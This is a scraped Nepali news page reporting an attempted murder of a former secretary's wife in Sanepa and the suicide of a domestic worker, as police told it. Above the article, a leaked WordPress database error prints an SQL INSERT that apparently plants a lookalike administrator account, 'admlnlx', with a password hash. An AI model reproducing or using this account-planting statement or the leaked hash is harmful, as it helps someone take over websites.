WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bw4NKbWqvijGUdpLMJYGxa8ZIXiNZ5.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:24:54', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । पूर्वसचिव अर्जुन कार्कीकी पत्नी मुनाको हत्या प्रयास भएको छ ।
सोमबार बिहान सानेपास्थित निवासमै मुनाको हत्या प्रयास भएको महानगरीय प्रहरी परिसर, ललितपुरका प्रमुख एसएसपी टेकप्रसाद राईले बताए ।
उनले भने, ‘उहाँको अवस्था गम्भीर छ । हामी अस्पताल लाँदैछौं ।’
घरमा कामदार विशेष चौधरीले पनि आत्महत्या गरेका प्रहरीले जनाएको छ ।
अहिले घटनास्थलमा फरेन्सिक विज्ञको टोली पठाइँदैछ । घटनामा कसले र किन गरायो भन्ने खुलेको छैन । घटनामा प्रयोग भएको हतियारबारे पनि प्रहरीले खुलाएको छैन ।
sourse:onlinekhabar